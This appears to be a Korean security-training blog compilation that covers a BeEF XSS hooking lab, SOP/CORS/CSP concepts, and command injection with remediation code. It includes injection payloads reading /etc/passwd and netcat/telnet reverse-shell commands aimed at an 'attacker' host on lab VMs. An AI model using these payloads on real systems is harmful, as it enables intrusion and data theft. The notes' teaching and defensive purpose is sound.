     Memory: 92.6M
        CPU: 3.968s
     CGroup: /system.slice/beef-xss.service
             └─759637 ruby /usr/share/beef-xss/beef

Dec 18 23:11:36 kali beef[759637]: == 24 CreateAutoloade…==
Dec 18 23:11:36 kali beef[759637]: == 25 CreateXssraysSc…==
Dec 18 23:11:36 kali beef[759637]: -- create_table(:xssr…s)
Dec 18 23:11:36 kali beef[759637]:    -> 0.0019s
Dec 18 23:11:36 kali beef[759637]: == 25 CreateXssraysSc…==
Dec 18 23:11:36 kali beef[759637]: [23:11:35][*] BeEF is…..
Dec 18 23:11:36 kali beef[759637]: [23:11:36][!] [AdminU…ny
Dec 18 23:11:36 kali beef[759637]: [23:11:36]    |_  [Ad… !
Dec 18 23:11:36 kali beef[759637]: [23:11:36][!] [AdminU…ny
Dec 18 23:11:36 kali beef[759637]: [23:11:36]    |_  [Ad… !
Hint: Some lines were ellipsized, use -l to show in full.

# 아래 URL로 접속하기
[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

Beef로 접속하기 http://127.0.0.1:3000/ui/panel

Kali에서 XSS 취약점을 가진 게시판에 hook.js가 실행되도록 스크립트 코드를 추가

http://victim:8080/openeg (id: test / pw :test) > 게시판 > 쓰기

위 스크립트가 있는 게시물 작성

winXP에서 http://victim:8080/openeg 접속 > 다른 계정으로 로그인 > 게시판 > Kali에서 작성한 게시물 조회

Kali에서 Beef Control Panel에서 확인하면 감염된걸 확인할 수 있다. winXP는 이제 좀비컴퓨터다.

Commands 탭에 Module Tree에 색상별 의미

● : 명령 모듈은 대상에게 작동하며 사용자에게 보이지 않습니다. ● : 명령 모듈이 이 대상에게 작동하는지 아직 확인되지 않았습니다. ● : 명령 모듈은 대상에게 작동하지만 사용자에게 보일 수 있습니다. ● : 명령 모듈이 이 대상에게 작동하지 않습니다.

감염된 PC(winXP)의 쿠키를 가져올 수 있다.

감염된 PC(winXP)를 강제로 다른 페이지로 이동시킬 수 있다. Hooked Browsers에서 victim 선택 > Commands 탭 > Module Tree > Browser폴더에서 Redirect Browser 클릭 > Redirect Browser URL 변경 > Excute

안전한 코드로 변경하는 방법 (방법1) MVC구조에서 Controller에 해당하는 부분에서 필터링

// BoardController.java
@RequestMapping("/view.do")
public ModelAndView boardView(HttpServletRequest request) {
    int idx = Integer.parseInt(request.getParameter("idx"));
    BoardModel board = service.getOneArticle(idx);

    service.updateHitcount(board.getHitcount() + 1, idx);

    List commentList = service.getCommentList(idx);

    ModelAndView mav = new ModelAndView();
    mav.addObject("board", board);
    mav.addObject("commentList", commentList);
    mav.setViewName("/board/view");
    return mav;
}

// BoardController.java
@RequestMapping("/view.do")
public ModelAndView boardView(HttpServletRequest request) {
    int idx = Integer.parseInt(request.getParameter("idx"));
    BoardModel board = service.getOneArticle(idx);

    // (1) 조회한 게시판 정보(번호,제목,내용,작성자,..)에서 게시판 내용 추출
    String content = board.getContent();

    // (2) lucy를 이용해서 안전한 문자열로 변경
    XssFilter filter = XssFilter.getInstance("lucy-xss-superset.xml");
    content = filter.doFilter(content);
    System.out.println("AFTER >>> "+content);

    // (3) 안전하게 변경한 내용을 다시 게시판 정보에 추가
    board.setContent(content);

    service.updateHitcount(board.getHitcount() + 1, idx);

    List commentList = service.getCommentList(idx);

    ModelAndView mav = new ModelAndView();
    mav.addObject("board", board);
    mav.addObject("commentList", commentList);
    mav.setViewName("/board/view");
    return mav;
}

스크립트가 문자열 그대로 출력되는 것을 확인할 수 있다.

(방법2) MVC구조에서 View에 해당하는 부분에서 필터링



    
    
    
        글번호
        제목
        작성자
        댓글수
        조회수
        추천수
        작성일    
    
    
    
    
        ${board.rnum}
        
            /img/hit.jpg" />
            ${board.subject}
        ${board.writer}${board.writer}
        ${board.comment}
        ${board.hitcount}
        ${board.recommendcount}
        ${board.writeDate}

글번호	제목	작성자	댓글수	조회수	추천수	작성일
${board.rnum}	/img/hit.jpg" /> ${board.subject}	${board.writer}${board.writer}	${board.comment}	${board.hitcount}	${board.recommendcount}	${board.writeDate}


<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>


    
    
    
        글번호
        제목
        작성자
        댓글수
        조회수
        추천수
        작성일    
    
    
    
    
        ${board.rnum}
        
            /img/hit.jpg" />
            ${board.subject}
        ${board.writer}${board.writer}

3. Origin

3.1. 정의

웹 콘텐츠의 출처(origin)는 접근할 때 사용하는 URL의 스키마(프로토콜), 호스트(도메인), 포트로 정의
두 객체의 스키마, 호스트, 포트가 모두 일치하는 경우 같은 출처를 가졌다고 말한다.

4. SOP

4.1. 정의

동일 출처 정책(Same Origin Policy)의 약어
어떤 출처에서 불러온 문서나 스크립트가 다른 출처에서 가져온 리소스와 상호 작용할 수 있는 방법을 제한하는 보안 메커니즘

4.2. 목적

잠재적 악성 문서를 격리하여 가능한 공격 벡터를 줄이기 위함

공격 벡터란? 공격자가 네트워크 또는 시스템에 침입하는 방법을 의미 공격 벡터를 줄인다. = 공격할 수 있는 경우의 수를 줄이겠다.

4.3. 출처 정의

프로토콜, 포트, 호스트가 같은 2개의 URL은 동일한 출처를 갖는다.
http://store.company.com/dir/page.html 과 출처 비교 예시

4.4. 출처 상속

about:blank 또는 javascript: URL이 있는 페이지에서 실행된 스크립트는 해당 URL이 포함된 문서의 출처를 상속 ⇒ 이런 유형의 URL에는 원본 서버에 대한 정보가 포함되어 있지 않기 때문

4.5. 파일 출처

file:/// 스키마 사용 시 출처를 불투명 출처로 간주
file:/// 스키마를 사용하여 로드한 경우 동일한 폴더에 있는 파일들이라 할지라도 각각의 파일이 서로 다른 출처로 간주된다. ⇒ CORS 오류 발생
http:// 또는 https:// 스키마를 사용하여 파일에 접근해야 SOP를 준수할 수 있다.

file:/// 스키마란? 로컬 파일 시스템에 접근하는 방법으로 웹 브라우저에서 file:/// 스키마를 사용하면 컴퓨터의 파일 시스템에 직접 접근 가능 예시) file:///C:/Users/username/Documents/file.txt

4.6. 교차 출처 네트워크 접근

웹 브라우저가 http://example.com 에서 호스팅되고 있지만 XMLHttpRequest 나 를 통해 같은 출처 뿐만 아니라 다른 출처의 리소스를 가져올 수 있다.
교차 출처로 삽입할 수 있는 리소스
- 를 사용하는 JavaScript. 구문 오류에 대한 오류 세부 정보는 동일 출처 스크립트에서만 사용할 수 있습니다.
- 로 적용된 CSS. CSS의 완화된 구문 규칙으로 인해 교차 출처 CSS에는 올바른 Content-Type 헤더가 요구됩니다. 브라우저는 MIME 유형이 올바르지 않고 리소스가 유효한 CSS 구성으로 시작하지 않는 교차 출처 로드인 경우 스타일시트 로드를 차단합니다.
- 로 표시하는 이미지.
- 와 (en-US)로 재생하는 미디어.
- 와 로 삽입하는 외부 리소스.
- @font-face 로 적용하는 글꼴. 일부 브라우저는 교차 충처를 허용하지만, 다른 브라우드는 동일 출처를 요구할 수도 있습니다.
- (en-US) 으로 삽입하는 모든 것. 사이트는 X-Frame-Options 헤더를 사용하여 출처 간 프레이밍을 방지할 수 있습니다.

⇒ 교차 출처로 삽입할 수 있는 리소스 들은 대부분 src 속성을 사용해 외부 리소스 위치를 지정한다.

5. CORS

5.1. 정의

교차 출처 자원 공유(Cross-Origin Resource Sharing)의 약어
서비스를 제공하는 사이트에서Access-Control-Allow-Origin 헤더를 사용하여, 리소스 사용 여부 지정
SOP 완화 정책

서비스를 제공하는 사이트란? JavaScript를 이용해서 요청하는 사이트

5.2. 목적

웹 보안을 유지하면서 웹 애플리케이션이 다른 출처의 리소스에 안전하게 접근할 수 있도록 하는 것

5.3. 사용법

서버 설정
- 서버는 CORS를 지원하도록 설정 서버에 Access-Control-Allow-Origin 헤더를 포함시켜 CORS를 지원하도록 설정
프리플라이트 요청
- 내가 자바스크립트를 이용해 리소스를 요청하는 것이 허락되는지 미리 확인하는 단계
- 브라우저가 실제 요청을 보내기 전에 OPTIONS 메서드를 사용하여 서버에게 요청의 허용 여부를 미리 확인하는 것을 의미
- GET HEAD POST
클라이언트 설정
- 클라이언트 측에서는 XMLHttpRequest 객체나 Fetch API를 사용하여 요청을 보낼 때 CORS를 사용하도록 설정
특정 요청 처리
- 단순 요청(Simple requests)은 특정 조건을 충족하는 요청으로 CORS 프리플라이트를 트리거 X

6. CSP

6.1. 정의

콘텐츠 보안 정책(Content Security Police)의 약어
교차 사이트 스크립팅(XSS)과 데이터 주입 공격을 비롯한 특정 유형의 공격을 탐지하고 완화하는 데 도움이 되는 추가 보안 계층
브라우저에서 지원하는 기능

6.2. 목적

크로스 사이트 스크립팅(XSS) 공격을 방어하기 위한 보안 정책
- 브라우저에서 실행되는 스크립트를 특정한 도메인에서만 실행될 수 있도록 지정(화이트리스트 방식)
- 개발자가 작성한 스크립트 코드(브라우저가 실행)와 공격자가 작성한 스크립트 코드(브라우저가 실행 차단)를 구분하기 위한 방법
패킷 스니핑 공격 완화
- 콘텐츠를 로드할 수 있는 도메인 제한
- 사용할 수 있는 프로토콜 지정
- 쿠키 secure 속성 표시
- HTTP페이지의 경우 해당 HTTPS페이지로 자동 리디렉션 제공
- Strict-Transport-Security 응답 헤더를 통해서 제공되는 정보를 이용해 판단

default-src 'none'; 
script-src 
'self' 
// 믿을 수 있는 Internal 스크립트 코드의 해쉬를 정의
www.googletagmanager.com platform.twitter.com syndication.twitter.com 'sha256-ewTm8QMx/IkmbIFAIapvCHoCrGgIIHhn8qKC7/5Y2Ro=' 
// (다음에 나오는 해쉬값을 가지는) 인라인 스크립트를 허용 
'unsafe-hashes'
'sha256-mplq9U9bn5xLaFQjbIOde0Eu7cXsI2xaTPex2jLztp0='; 
style-src 
'self' 
cdnjs.cloudflare.com fonts.googleapis.com 
'sha256-5g0QXxO6NfvHJ6Uf5BK/hqQHtso8ZOdjlnbyKtYLvwc='; 
font-src 
fonts.gstatic.com cdnjs.cloudflare.com; 
img-src 
'self' 
syndication.twitter.com; 
frame-src 
platform.twitter.com; 
connect-src 
www.google-analytics.com

6.3. 사용 시 주의사항

외부에서 스크립트 파일을 가져와서 사용해야한다.
Internal, Inline으로 작성된 스크립트는 개발자가 작성한 스크립트인지 공격자가 작성한 스크립트인지 판단할 수 없다.
```
        
```

``` >**소스코드에 내부에 포함되어 있는 스크립트 코드의 해쉬를 추출** https://report-uri.com/home/hash

CSP에 정의되어 있는 해시에 포함되지 않기 때문에 해당 스크립트 코드는 실행되지 않는다.

window.onload=function(){
  var jsNode = document.getElementById("jsNode");
  jsNode.innerHTML = "CSP Not Supported" Your browser does not support CSP, the inline script executed and replaced this div content";
  jsNode.className="alert alert-danger";
}

CSP에 정의되어 있는 해시에 포함되므로 해당 스크립트 코드 실행된다.
```
runHashTest();
```
img-src는 디렉티브에 정의되지 않은 기원이므로 이미지를 가져와서 사용X

[SK shieldus Rookies 16기][취약점 진단] Command Injection의 개요와 공격 실습

Mon, 18 Dec 2023 04:22:20 GMT

1. Command Injection

1.1. 정의

어플리케이션에 운영체제 명령어(=Shell 명령어)를 실행하는 기능이 존재하는 경우
외부 입력값을 검증하거나 제한하지 않고, 운영체제 명령어 또는 운영체제 명령어의 일부로 사용하는 경우 발생

시스템의 제어권을 탈취하여 해당 시스템을 공격자 마음대로 제어하게 된다.

Shell이란? 사용자와 커널 사이에 있는 명령어 해석기

외부 입력값을 검증하지 않았다? 추가 명령어 실행에 사용되는 & | ; 등의 문자열 포함 여부를 확인하지 않고 사용

외부 입력값을 제한하지 않았다? 내부 로직에서 사용할 수 있는 명령어 또는 명령어 파라미터 값을 미리 정의하고, 정의된 범위 내에서 사용되도록 하지 않는 경우 ⇒ 화이트 리스트 방식으로 제한하지 않는 경우

1.2. 제한 방법

입력값 제한 방법

화이트 리스트 방식(=허용 목록) : 정의된 목록 범위 내의 값만 사용하도록 제한 ⇒ <>새로운 입력 유형에 대해서도 동일한 보안성을 제공하기 때문에 안전
블랙 리스트 방식(=제한 목록) : 정의된 목록의 값을 사용하지 않도록 제한 ⇒ 모집합의 규모가 크고 변화가 심한 경우에 사용

1.3. 예시

외부 입력값을 운영체제 명령어로 사용하는 경우

// run.jsp
String cmd = request.getParameter("cmd");
Runtime.exec(cmd);

개발자가 의도한 실행

run.jsp?cmd=ipconfig # 서버의 네트워크 설정 정보 반환

공격자가 조작한 실행

# 의도하지 않은 명령어 실행으로 계정 정보 노출
run.jsp?cmd=cat /etc/passwd

# 의도하지 않는 추가 명령어 실행으로 계정 정보 노출
run.jsp?cmd=ifconfig & cat /etc/passwd

외부 입력값을 운영체게 명령어 일부로 사용하는 경우 + 운영 체제 명령어의 파라미터로 사용되는 경우

// view.jsp
String file = request.getParameter("file");
Runtime.getRuntime().exec("cat " + file);

개발자가 의도한 실행

# cat 명령어의 일부(파라미터)로 사용하여 /data/upload/ 디렉토리 아래에 있는 myfile.txt 내용을 반환
view.jsp?file=/data/upload/myfile.txt

공격자가 조작한 실행

# 시스템 파일 내용 반환
view.jsp?file=/etc/passwd
# 추가 명령어 실행을 통해 시스템 파일 내용 반환
view.jsp?file=/data/dupload/myfile.txt & cat /etc/passwd

1.4. 방어 기법

불필요한 운영체제 명령어 실행을 제거.
운영체제 명령어 또는 운영체제 명령어의 파라미터로 사용될 값을 화이트 리스트 방식으로 제한. 시스템 내부에서 사용할 운영체제 명령어 또는 운영체제 명령어의 파라미터로 사용될 값을 미리 정의하고 정의된 범위 내에서 사용되도록 제한.
추가 명령어 실행에 사용되는 & | ; 등의 문자가 포함되어 있는지 검증하고 사용.
외부에서 시스템 내부 처리를 유추할 수 없도록 코드화.

2. Openeg

kali linux > http://victim:8080/openeg 접속

소스코드 확인 Select에서 옵션 선택 후 실행 버튼 클릭 > data 파라미터 값으로 type or dir이 서버로 전달된다. dir을 선택 후 실행 버튼을 클릭했을 때 출력되는 결과를 보면 마치 명령 프롬프트에서 dir명령을 실행한 것과 유사하다.

사용자 화면에서 선택한 값은 아래와 같이 서버로 전달

command_test.do?data=dir

서버로 전달된 값은 명령어 실행에 사용될 것으로 추측

Runtime.getRuntime().exec("dir");

개발자 도구에서 설정된 명령어가 아닌 다른 명령어로 변경 후 전달

한글 깨져서 나오지만 ipconfig 명령어가 실행된 것을 확인할 수 있다.

& 문자를 사용해 추가 명령어를 실행을 시도한다. 마찬가지로 한글이 깨져서 나오지만 whoami 명령어가 실행된 것을 확인할 수 있다.

기존 TestController.java 소스코드

@RequestMapping(value = "/test/command_test.do", method = RequestMethod.POST)
    @ResponseBody
    public String testCommandInjection(HttpServletRequest request, HttpSession session) {
        StringBuffer buffer = new StringBuffer();
        /* 요청 파라미터 값이 data의 값 추출 */
        String data = request.getParameter("data");
        /* 요청 파라미터 값이 type인 경우 */
        if (data != null && data.equals("type")) {
            /* 요청 파라미터 값을 "type 현재 디렉터리\files\file1.txt로 변경" */
            data = data + " " + request.getSession().getServletContext().getRealPath("/") + "files\\file1.txt";
        }

        Process process;
        String osName = System.getProperty("os.name");
        String[] cmd;

        if (osName.toLowerCase().startsWith("window")) {
            /* 요청 파라미터로 전달된 값을 운영체제에서 실행 가능한 명령어로 변경하는 과정 */
            cmd = new String[] { "cmd.exe", "/c", data };
            for (String s : cmd)
                System.out.print(s + " ");
        } else {
            cmd = new String[] { "/bin/sh", data };
        }
        try {
            /* 요청 파라미터로 전달된 값을 운영체제 명령어로 사용 */
            process = Runtime.getRuntime().exec(cmd);
            InputStream in = process.getInputStream();
            Scanner s = new Scanner(in);
            buffer.append("실행결과: 
");
            while (s.hasNextLine() == true) {
                buffer.append(s.nextLine() + "
");
            }
        } catch (IOException e) {
            buffer.append("실행오류발생");
            e.printStackTrace();
        }
        return buffer.toString();
    }

안전한 코드로 변경

/* (추가1) 해당 어플리케이션에서 사용할 명령어를 미리 정의 */
    private final String[] allowedCommands = { "type", "dir" }; 

@RequestMapping(value = "/test/command_test.do", method = RequestMethod.POST)
    @ResponseBody
    public String testCommandInjection(HttpServletRequest request, HttpSession session) {
        StringBuffer buffer = new StringBuffer();
        /* 요청 파라미터 값이 data의 값 추출 */
        String data = request.getParameter("data");
        /* (추가2) 요청 파라미터의 값이 미리 정의한 값의 범위에 포함되는지 확인 */
        List temp = new ArrayList(Arrays.asList(allowedCommands));
        if (!temp.contains(data)) {
            return "잘못된 입력입니다.";
        }

        if (data != null && data.equals("type")) {
            /* 요청 파라미터 값을 "type 현재 디렉터리\files\file1.txt로 변경" */
            data = data + " " + request.getSession().getServletContext().getRealPath("/") + "files\\file1.txt";
        }

        Process process;
        String osName = System.getProperty("os.name");
        String[] cmd;

        if (osName.toLowerCase().startsWith("window")) {
            /* 요청 파라미터로 전달된 값을 운영체제에서 실행 가능한 명령어로 변경하는 과정 */
            cmd = new String[] { "cmd.exe", "/c", data };
            for (String s : cmd)
                System.out.print(s + " ");
        } else {
            cmd = new String[] { "/bin/sh", data };
        }
        try {
            /* 요청 파라미터로 전달된 값을 운영체제 명령어로 사용 */
            process = Runtime.getRuntime().exec(cmd);
            InputStream in = process.getInputStream();
            Scanner s = new Scanner(in);
            buffer.append("실행결과: 
");
            while (s.hasNextLine() == true) {
                buffer.append(s.nextLine() + "
");
            }
        } catch (IOException e) {
            buffer.append("실행오류발생");
            e.printStackTrace();
        }
        return buffer.toString();
    }

서버 내부에서 처리에 사용하는 명령어가 전달되도록 되어 있음 기존webapp/WEB-INF/test/test.jsp 소스코드

...
(4) Command 인젝션

...

외부에서 내부 사용을 유추할 수 없도록 코드(0,1)로 변경

...
(4) Command 인젝션

...

TestController.java

/* (추가1) 해당 어플리케이션에서 사용할 명령어를 미리 정의 */
    private final String[] allowedCommands = { "type", "dir" }; 

    @RequestMapping(value = "/test/command_test.do", method = RequestMethod.POST)
    @ResponseBody
    public String testCommandInjection(HttpServletRequest request, HttpSession session) {
        StringBuffer buffer = new StringBuffer();

        /*  (추가2)사용자가 선택한 코드가 전달 => 0 or 1이 전달 => 미리 정의해놓은 명령어를 참조하는 값을 사용*/
        String data = request.getParameter("data");
        // 화이트 리스트 방식으로 입력값을 제한하는 것과 동시에 외부에서 내부 처리를 알 수 없도록 하는 것도 가능

        /* (추가3) 사용자 화면에서 전달된 코드를 내부 처리에 사용할 명령어로 변환 */
        try {
        data = allowedCommands[Integer.parseInt(data)];
        }cat3ch(Exception e) {
            /* 1. 사용자화면에서 0 or 1 가 아닌 숫자가 전달되는 경우(ex.100)
             *        배열 값의 범위를 벗어나기 때문에 오류 발생
             * 2. 사용자 화면에서 0 or 1가 아닌 문자가 전달되는 경우(ex. ipconfig)
             *       숫자로 변하는 과정에서 오류 발생*/
            System.out.println(e.getMessage());
            return "잘못된 입력입니다.";
        }
        if (data != null && data.equals("type")) {
            data = data + " " + request.getSession().getServletContext().getRealPath("/") + "files\\file1.txt";
        }

        Process process;
        String osName = System.getProperty("os.name");
        String[] cmd;

        if (osName.toLowerCase().startsWith("window")) {
            cmd = new String[] { "cmd.exe", "/c", data };
            for (String s : cmd)
                System.out.print(s + " ");
        } else {
            cmd = new String[] { "/bin/sh", data };
        }
        try {
            process = Runtime.getRuntime().exec(cmd);
            InputStream in = process.getInputStream();
            Scanner s = new Scanner(in);
            buffer.append("실행결과: 
");
            while (s.hasNextLine() == true) {
                buffer.append(s.nextLine() + "
");
            }
        } catch (IOException e) {
            buffer.append("실행오류발생");
            e.printStackTrace();
        }
        return buffer.toString();
    }

3. Webgoat

Injection Flaws > Commnad Injection

도움말 파일 : BasicAuthentication.help

만약 외부에서 전달된 값을 검증, 제한하지 않고 명령어 실행에 그대로 사용되면 추가 명령어 실행이 가능할 것 같음.

C:\FullstackLAB\workspace\.metadata\.plugins\org.eclipse.wst.server.core\tmp1\wtpwebapps\WebGoat\lesson_plans\English\BasicAuthentication.html" %26 type "C:\FullstackLAB\tools\apache-tomcat-7.0.109\conf\tomcat-users.xml

4. beebox

bWAPP > OS Command Injection

/var/www/bWAPP/commandi.php 파일에서 140째 열 수정하기 - 코드가 달라지는 것 아니고 보기 편하게 바꾸는 것 뿐임

$ sudo gedit /var/www/bWAPP/commandi.php

접근할 수 없는 경로의 시스템 파일 내용만 출력

www.nsa.gov | cat /etc/passwd

5. Reverce Connection

5.1. 정의

일반적으로 네트워크는 클라이언트 → 서버 방향으로 연결되지만 역으로 클라이언트 ← 서버 방향으로 연결되게 만드는 것을 말한다.

5.2. 목적

방화벽이나 NAT를 우회하기 위해 사용한다.

방화벽과 NAT의 동작 원리

방화벽은 일반적으로 외부 → 내부 접속을 제한하고, 외부 ← 내부 접속은 허용하는 경향이 있기 때문에 가능하다.
NAT는 내부 네트워크의 IP주소를 외부 네트워크의 IP 주소로 변환하는 역할을 하는데 일반적으로 NAT는 외부 → 내부 직접적인 접속을 막는다. 그러나 리버스 커넥션을 사용하면 외부 ← 내부 접속이 가능해진다.

6. Netcat(nc)

6.1. 정의

TCP/IP 연결을 사용하여 네트워크 연결을 통해 데이터를 읽거나 쓰는 도구
네트워크 탐색 도구 뿐만 아니라 네트워크 디버깅 도구로도 사용 가능

6.2. 주요 옵션

$ nc

-l : Netcat listen mode -u : Netcat TCP (기본값)에서 UDP 모드로 전환 -p port : 리스너의 경우 수신 포트, 클라이언트의 경우 출발지 포트 -e : 연결 후 수행 할 작업 -L : 영구 리스너 생성 (Windows만 작동) -s addr : 출발지 IP 주소 -n : DNS 주소 해석을 하지 않음 -z : 데이터 전송 안 함 -w secs : 시간 종료 값 정의 -v : 상세 모드

7. netcat을 이용한 Reverce Connection

cmd창 열어서 포트 지정

# LISTEN 상태인 특정 포트 지정
$ nc -l -p 8282

# 특정 주소와 특정 포트에 
$ www.nsa.gov ; nc 공격자주소 포트번호 -e /bin/bash

DNS lookup 검색창에 입력

$ www.nsa.gov ; nc kali 8282 -e /bin/bash

취약한 서버로 명령어를 전달 ⇒ beebox 서버에서 명령어가 실행되어 bash shell이 열림 ⇒ 공격자가 원하는 명령어 실행하면 결과가 출력 ⇒ beebox 사용자는 알 수 없다.

netcat을 이용한 OS Command Injection 공격조건 위와 같은 공격이 이루어지기 위해서는
1. 웹 어플리케이션에 OS Command Injection 취약점이 존재
2. 해당 웹 서버(beebox)에 netcat이 설치되어 있어야 한다.
nc 프로그램이 설치되지 않은 웹 서버는 어떻게 공격을 할까? 서버 관리 목록으로 많이 사용하는 프로그램을 이용해서 공격을 시도 ⇒ telnet

7.1. Telnet을 이용한 Rverce Connection

Kali에서 터미널 2개 열어서 서비스 실행

8282포트 명령어 입력용
```
$ nc -l -p 8282
```

9292포트 8282포트에서 입력한 명령어 실행 결과를 출력할 용도

$ nc -l -p 9292

beebox에서 http://beebox/bWAPP (id: bee / pw: bug) 접속 > OS Command Injection > DNS lookup 검색창에 아래 명령어 입력 후 Lookup 버튼 클릭

# 공격자의 시스템에 2개의 Telnet 연결을 생성해 이 연결을 통해 쉘 명령어를 전송하고 결과를 받는다. 
www.nsa.gov|sleep 1000|telnet attacker 8282|/bin/bash|telnet attacker 9292
# sleep 1000 ⇒ 프로그램 실행 1000초 동안 일시중지
# telnet attacker 8282 ⇒ attacker라는 호스트의 9292포트에 telnet연결 시도
# /bin/bash ⇒ 쉘 실행 명령어. 이 쉘은 이전 명령어의 출력을 입력으로 받아 실행
# telnet attacker 9292 ⇒ attacker라는 호스트의 9292포트에 telnet연결 시도. 이 연결은 이전 명령어(/bin/bash)의 출력을 입력으로 받는다.

7.2. 안전한 코드로 변경하는 방법

beebox VM

commandi.php 에서 구조 확인

$ sudo gedit /var/www/bWAPP/commandi.php

...(생략)...

Enter a domain name...";

        }

        else
        {

            # 쉘에서 nslookup 명령어를 실행하고 실행 결과를 반환(https://www.php.net/manual/en/function.shell-exec.php)
            # 설정된 보안 등급에 맞춰서 입력값을 처리한 후 nslookup 명령어의 매개변수로 사용
            echo "
" . shell_exec("nslookup  " . commandi($target)) . "
";

        }

    }

    ?>

...(생략)...

functions_external.php 코드 수정

$ sudo gedit /var/www/bWAPP/functions_external.php

...(생략)...

function commandi_check_1($data){
    # 추가 명령어 실행에 사용되는 &와 ; 기호 제거
    $input = str_replace("&", "", $data);
    $input = str_replace(";", "", $input);
    return $input;
}

function commandi_check_2($data){
    # Escape shell metacharacters
    # https://www.php.net/manual/en/function.escapeshellcmd.php
    return escapeshellcmd($data);
}


function commandi_check_3($data){
    # 추가 명령어 실행에 사용되는 &, ;, | 기호를 제거
    $input = str_replace("&", "", $data);
    $input = str_replace(";", "", $input);
    $input = str_replace("|", "", $input);
    return $input;
}

...(생략)...

p-jina.log

[DBeaver] Network unavailable due to a certificate issue. 해결방법

에러 메세지

해결방법

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 금융보안

1. 보안동향

2. 법률 동향

2.1. 법규/컴플라이언스 상의 취약점 분석평가 강제 조항

3. 보안취약점 분석평가

3.1. 정의

3.2. 평가 대상

3.3. 평가 주기

3.4. 분석평가 방법

3.5. 분석평가 절차

3.6. 분석평가 기준

4. 금융 회사 · 기관 분류

5. 환경적 보안

6. 보안컨설팅 사업

6.1. 사업 유형 분류

6.2. 컨설팅 유형

6.3. 보안컨설턴트 vs 아키텍트

7. 정보보호 컨설팅 방법론(ISCM)

7.1. 수행절차

8. 현황 분석

8.1. IT 인프라 취약점 점검 - 수행절차

8.2. 정보보호관리체계 평가 기준

9. 위험분석 및 평가

9.1. 위험분석 평가 절차

10. 개인정보보호법 주요 개정사항

10.1. 개인정보보호법 제26조에 따른 재위탁 제한에 관한 법률

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 클라우드 컴퓨팅서비스 보안

1. DeSecOps 프로세스별 보안 역할

2. 단일 테넌트 vs 멀티 테넌트

3. 프로비저닝(Provisioning)

3.1. 정의

3.2. 종류

4. VPC(Virtual Private Cloud)

4.1. 정의

4.2. 가상 방화벽

4.3. VPC간 통신 방식

4.4. VPC Peerging 방식

5. DMZ, Private 구조

6. Shared Security Responsibility Model(SSRM)

7. 클라우드 컴퓨팅 보안 위협 요소

7.1. 가상환경

7.2. 클라우드 인프라

7.3. 정책

7.4. 사고 및 장애 대응

7.5. 인증 및 권한

7.6. 데이터

8. 클라우드컴퓨팅서비스 보안운영 아키텍처

9. 데이터 보안 생명주기 6단계

9.1. 기능별 데이터 생명주기 단계별 매핑표

10. 클라우드 보안 문서체계

11. 클라우드 개인정보보호 분야

12. 클라우드 접근 인프라스트럭처

12.1. 기본보안 구성요소

12.2. 접근통제

12.3. 식별 및 인증

13. CSAP 인증제도

13.1 .인증 개요

13.2. CSAP 인증 클라우드 보안컨설팅 수행 프로세스

13.3. 인증신청 시 제출문서

13.4. 관련 법령

13.5. CSAP 클라우드 보안인증 유형 결정방안

13.6. 클라우드컴퓨팅서비스 위험관리 8단계 프로세스

[SK shieldus Rookies 16기][클라우드 보안 컨설팅 실무] 하이퍼바이저, 가상화, 가상머신과 컨테이너, 쿠버네티스, 도커

1. 하이퍼바이저(Hypervisor)

1.1. 정의

1.2. 특징

1.3. 종류

2. 가상화 vs 클라우드 컴퓨팅

2.1. 가상화(Virtualization)

2.2. 클라우드 컴퓨팅(Cloud Computing)

💡 워크로드 상태 Stateless와 Stateful

3. 인스턴스

3.1. 정의

3.2. 특징

3.3. 종류

4. 가상머신 vs 컨테이너